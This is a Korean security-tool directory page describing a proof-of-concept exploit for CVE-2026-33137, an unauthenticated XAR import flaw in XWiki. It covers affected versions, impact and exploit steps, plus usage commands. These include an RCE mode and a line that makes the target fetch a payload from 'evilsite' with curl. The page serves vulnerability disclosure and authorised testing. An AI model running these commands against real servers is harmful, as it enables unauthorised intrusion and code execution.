Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName} | Kitploit
도구/GitHubGitHub/portbuster1337/cve-2026-33137
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName}

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-33137

XWiki Platform - REST /wikis/{wikiName}를 통한 인증되지 않은 XAR 가져오기

설명

XWiki Platform의 POST /wikis/{wikiName} REST API 엔드포인트는 인증 또는 권한 검사를 수행하지 않고 XAR(XWiki Archive) 가져오기를 실행합니다. 인증되지 않은 공격자는 조작된 XAR 파일을 전송하여 대상 위키의 임의 문서를 생성하거나 업데이트할 수 있습니다.

  • CVE: CVE-2026-33137
  • CWE: CWE-862 인가 누락
  • CVSS 4.0: 9.3 (치명적) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • 게시일: 2026-05-20

영향을 받는 버전

상태버전
취약함> 15.10.16, > 16.4.6, > 16.10.2
패치됨16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

영향

인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  • 임의의 콘텐츠로 임의의 위키 페이지 생성
  • 기존 위키 페이지 덮어쓰기
  • 악성 Velocity/Groovy 스크립트가 포함된 페이지를 생성하여 잠재적으로 RCE 달성 (스크립팅이 활성화된 경우)

세부 정보

REST 엔드포인트 POST /xwiki/rest/wikis/{wikiName}는 요청 본문에서 XAR 파일을 받아들이고 요청자에게 ADMIN 권한이 있는지 확인하지 않고 위키로 직접 가져옵니다. 수정 사항(커밋 4b7b95b)은 ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...)를 사용하여 권한 검사를 추가합니다.

PoC 사용법

root@kitploit:~
# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

RCE 모드 (--rce)

--rce 플래그는 지정된 명령 문자열을 실행하는 Groovy 및 Velocity 페이로드가 포함된 페이지를 가져옵니다. 자동으로:

  1. 사전 점검을 실행합니다 (버전 감지, 취약점 상태, XAR 엔드포인트 테스트, 트리거 경로 접근성)
  2. {{groovy}} 및 {{velocity}} 매크로에 사용자 지정 명령이 포함된 페이지를 가져옵니다
  3. REST API, 웹 UI 및 SSTI 스타일 주입을 통한 렌더링을 시도합니다
  4. 접근 가능한 트리거 경로와 차단된 경로를 보고합니다

RCE 성공을 위한 요구 사항:

  • 대상이 게스트의 페이지 보기를 허용해야 합니다 (또는 -u / --password를 통해 자격 증명 제공)
  • 보기 사용자에게 스크립팅/프로그래밍 권한이 활성화되어 있어야 합니다
  • 트리거 경로가 인증 리디렉션으로 차단되지 않아야 합니다

익스플로잇 작동 방식

  1. 다음을 포함하는 최소한의 XAR(ZIP) 파일이 구성됩니다:
    • package.xml - 패키지 설명자
    • {Space}/{Page}.xml - 콘텐츠가 포함된 문서 XML
  2. XAR 바이트가 취약한 엔드포인트에 POST됩니다
  3. 취약한 경우 문서가 인증 없이 생성됩니다
  4. 선택적으로 문서 메타데이터를 다시 읽어 검증합니다

면책 조항

이 PoC는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에 이 익스플로잇을 무단 사용하는 것은 불법입니다. 저자는 이 소프트웨어로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

참조

  • GitHub 보안 권고 GHSA-qrvh-r3f2-9h4r
  • 커밋 4b7b95b (수정)
  • JIRA XWIKI-23953
  • NVD 항목
도구 다운로드